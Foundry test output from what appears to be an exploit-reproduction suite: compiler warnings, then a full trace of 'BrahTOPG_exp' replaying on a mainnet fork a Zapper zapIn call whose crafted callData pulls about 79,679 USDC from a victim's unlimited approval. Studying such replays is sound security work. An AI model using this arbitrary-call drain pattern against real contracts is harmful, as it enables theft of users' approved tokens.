Compiling 20 files with Solc 0.8.10
Compiling 21 files with Solc 0.8.28
Solc 0.8.28 finished in 942.04ms
Solc 0.8.10 finished in 1.08s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/BrahTOPG_exp.sol:27:5:
   |
27 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2022-11/BrahTOPG_exp.sol:28:5:
   |
28 |     IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2022-11/BrahTOPG_exp.sol:40:9:
   |
40 |         address(WETH).call{value: 1e15}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:73:27:
   |
73 |     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
   |                           ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:73:43:
   |
73 |     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
   |                                           ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:73:62:
   |
73 |     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
   |                                                              ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:78:9:
   |
78 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:83:22:
   |
83 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-11/BrahTOPG_exp.sol:83:39:
   |
83 |     function approve(address spender, uint256 amount) external returns (bool) {
   |                                       ^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-11/BrahTOPG_exp.sol:73:5:
   |
73 |     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-11/BrahTOPG_exp.sol:77:5:
   |
77 |     function balanceOf(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.63s (1.74ms CPU time)

Ran 1 test for src/test/2022-11/BrahTOPG_exp.sol:ContractTest
[PASS] testExploit() (gas: 304761)
Logs:
  [End] Attacker USDC balance after exploit: 79679.661825

Traces:
  [5817] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 15933794 [1.593e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [377661] ContractTest::testExploit()
    ├─ [23731] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::fallback{value: 1000000000000000}()
    │   ├─ emit Deposit(dst: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 1000000000000000 [1e15])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000000038d7ea4c68000
    │   └─ ← [Stop]
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 1000000000000000 [1e15]
    ├─ [87533] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokensSupportingFeeOnTransferTokens(1000000000000000 [1e15], 0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x853d955aCEf822Db058eb8505911ED77F175b99e], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1668012935 [1.668e9])
    │   ├─ [8225] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76, 1000000000000000 [1e15])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76, value: 1000000000000000 [1e15])
    │   │   ├─  storage changes:
    │   │   │   @ 0x3cc0bf2399af08f8f8add3139577bb591a488b74a3c0d2f7e7aa7bc79860fef0: 0x0000000000000000000000000000000000000000000000003700b1ac845a28fd → 0x00000000000000000000000000000000000000000000000037043f2b2920a8fd
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000000038d7ea4c68000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2504] 0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76::getReserves() [staticcall]
    │   │   └─ ← [Return] 4734807427443384865660 [4.734e21], 3963363026599028989 [3.963e18], 1668012119 [1.668e9]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76) [staticcall]
    │   │   └─ ← [Return] 3964363026599028989 [3.964e18]
    │   ├─ [60746] 0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76::swap(1190760418702636444 [1.19e18], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [28223] 0x853d955aCEf822Db058eb8505911ED77F175b99e::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1190760418702636444 [1.19e18])
    │   │   │   ├─ emit Transfer(from: 0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1190760418702636444 [1.19e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000000010866e4ab95db59c
    │   │   │   │   @ 0x2f81f99c1a40d802a5f3615cfad6dd321ccc5f7169f8bb60497fa0142a5b308e: 0x000000000000000000000000000000000000000000000100aca71d2cc413537c → 0x0000000000000000000000000000000000000000000001009c20aee20ab59de0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76) [staticcall]
    │   │   │   └─ ← [Return] 4733616667024682229216 [4.733e21]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76) [staticcall]
    │   │   │   └─ ← [Return] 3964363026599028989 [3.964e18]
    │   │   ├─ emit Sync(reserve0: 4733616667024682229216 [4.733e21], reserve1: 3964363026599028989 [3.964e18])
    │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 1000000000000000 [1e15], amount0Out: 1190760418702636444 [1.19e18], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x000000000000000000000000000000007960e022b8ef3e4e754159f8dab28920 → 0x0000000000000000000000000000000079618eff011f03763fe28112119de6d0
    │   │   │   @ 10: 0x0000000000000000000000000021d7f26fff5072e6071b5c55766838ceeb64b0 → 0x0000000000000000000000000021d8014fecbab2ae3ee09aa24dd9b828d3c370
    │   │   │   @ 8: 0x636bd8570000000000003700b1ac845a28fd000000000100aca71d2cc413537c → 0x636bdb8700000000000037043f2b2920a8fd0000000001009c20aee20ab59de0
    │   │   └─ ← [Stop]
    │   ├─ [666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 1190760418702636444 [1.19e18]
    │   └─ ← [Stop]
    ├─ [9815] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3) [delegatecall]
    │   │   └─ ← [Return] 79679661825 [7.967e10]
    │   └─ ← [Return] 79679661825 [7.967e10]
    ├─ [3426] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::allowance(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3, 0xD248B30A3207A766d318C7A87F5Cf334A439446D) [staticcall]
    │   ├─ [2637] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::allowance(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3, 0xD248B30A3207A766d318C7A87F5Cf334A439446D) [delegatecall]
    │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007903129639935 [1.157e77]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007903129639935 [1.157e77]
    ├─ [183727] 0xD248B30A3207A766d318C7A87F5Cf334A439446D::zapIn(ZapData({ requiredToken: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, amountIn: 1, minAmountOut: 0, allowanceTarget: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, swapTarget: 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, callData: 0x23b872dd000000000000000000000000a19789f57d0e0225a82eeff0fecb9f3776f276a30000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000128d472701 }))
    │   ├─ [2404] 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3::zapper() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000d248b30a3207a766d318c7a87f5cf334a439446d
    │   ├─ [1139] ContractTest::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xD248B30A3207A766d318C7A87F5Cf334A439446D, 1)
    │   │   └─ ← [Return] true
    │   ├─ [327] 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3::wantToken() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000853d955acef822db058eb8505911ed77f175b99e
    │   ├─ [327] 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3::wantToken() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000853d955acef822db058eb8505911ed77f175b99e
    │   ├─ [2666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(0xD248B30A3207A766d318C7A87F5Cf334A439446D) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [674] ContractTest::balanceOf(0xD248B30A3207A766d318C7A87F5Cf334A439446D) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [25540] ContractTest::approve(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   ├─ [23423] 0x853d955aCEf822Db058eb8505911ED77F175b99e::transfer(0xD248B30A3207A766d318C7A87F5Cf334A439446D, 10)
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xD248B30A3207A766d318C7A87F5Cf334A439446D, value: 10)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4353ec233c2f95bdc8e4a11194b8c9b41bcd07349cd13a36b1a02e77b41879cd: 0 → 10
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000010866e4ab95db59c → 0x00000000000000000000000000000000000000000000000010866e4ab95db592
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [41492] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 79679661825 [7.967e10])
    │   │   ├─ [40697] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 79679661825 [7.967e10]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xA19789f57D0E0225a82EEFF0FeCb9f3776f276a3, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 79679661825 [7.967e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3c52fa0ed710c0d408d14c58cade9f1567ad6f99ad66ef2945f2384cb089ae73: 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffdabf41bff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffeb1eacf4fe
    │   │   │   │   @ 0xc3c1b20958d63e904c4ac66a19a6f708d70f2b0040a8b6a88ff5ca6693f03d8a: 0x000000000000000000000000000000000000000000000000000000128d472701 → 0
    │   │   │   │   @ 0xea80dd88ed2c8da1b3cfa53b6b2568ae58fe83d484d0c01324a62ba1aa9ffdac: 0 → 0x000000000000000000000000000000000000000000000000000000128d472701
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(0xD248B30A3207A766d318C7A87F5Cf334A439446D) [staticcall]
    │   │   └─ ← [Return] 10
    │   ├─ [327] 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3::wantToken() [staticcall]
    │   │   └─ ← [Return] 0x000000000000000000000000853d955acef822db058eb8505911ed77f175b99e
    │   ├─ [24733] 0x853d955aCEf822Db058eb8505911ED77F175b99e::approve(0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3, 10)
    │   │   ├─ emit Approval(owner: 0xD248B30A3207A766d318C7A87F5Cf334A439446D, spender: 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3, value: 10)
    │   │   ├─  storage changes:
    │   │   │   @ 0x095b84e4130fe94141ca73a72826d7f0d797f92766732dc954c754c7c91d4acc: 0 → 10
    │   │   └─ ← [Return] true
    │   ├─ [63297] 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3::deposit(10, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [2474] 0xD2A0B3B0cEf4F4dCdd9F41dc2802010987D8d2e7::getSlippageAccountedAmount(10)
    │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000000a
    │   │   ├─ [2666] 0x853d955aCEf822Db058eb8505911ED77F175b99e::balanceOf(0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3) [staticcall]
    │   │   │   └─ ← [Return] 72428494116542870975961 [7.242e22]
    │   │   ├─ [8974] 0x853d955aCEf822Db058eb8505911ED77F175b99e::transferFrom(0xD248B30A3207A766d318C7A87F5Cf334A439446D, 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3, 10)
    │   │   │   ├─ emit Transfer(from: 0xD248B30A3207A766d318C7A87F5Cf334A439446D, to: 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3, value: 10)
    │   │   │   ├─ emit Approval(owner: 0xD248B30A3207A766d318C7A87F5Cf334A439446D, spender: 0xB3dA8d6Da3eDe239ccbF576cA0Eaa74D86f0e9D3, value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x4353ec233c2f95bdc8e4a11194b8c9b41bcd07349cd13a36b1a02e77b41879cd: 10 → 0
    │   │   │   │   @ 0x9edd44108d3f06ac2d85db730dbc6eba4ff68a4e54c0f6ab212574b84ae16391: 0x000000000000000000000000000000000000000000000f565b45c8632fa7f5d9 → 0x000000000000000000000000000000000000000000000f565b45c8632fa7f5e3
    │   │   │   │   @ 0x095b84e4130fe94141ca73a72826d7f0d797f92766732dc954c754c7c91d4acc: 10 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9)
    │   │   ├─  storage changes:
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 9
    │   │   │   @ 0x095b84e4130fe94141ca73a72826d7f0d797f92766732dc954c754c7c91d4acc: 10 → 0
    │   │   │   @ 2: 0x000000000000000000000000000000000000000000000f4a88eac928fecba266 → 0x000000000000000000000000000000000000000000000f4a88eac928fecba26f
    │   │   └─ ← [Return] 9
    │   ├─ emit ZappedIn(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1, param3: 9)
    │   ├─  storage changes:
    │   │   @ 0x095b84e4130fe94141ca73a72826d7f0d797f92766732dc954c754c7c91d4acc: 0 → 10
    │   └─ ← [Stop]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   └─ ← [Return] 79679661825 [7.967e10]
    │   └─ ← [Return] 79679661825 [7.967e10]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDC balance after exploit", val: 79679661825 [7.967e10], decimals: 6)
    ├─  storage changes:
    │   @ 0: 2 → 1
    │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000000038d7ea4c68000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 20.12s (16.91s CPU time)

Ran 2 test suites in 21.25s (21.75s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
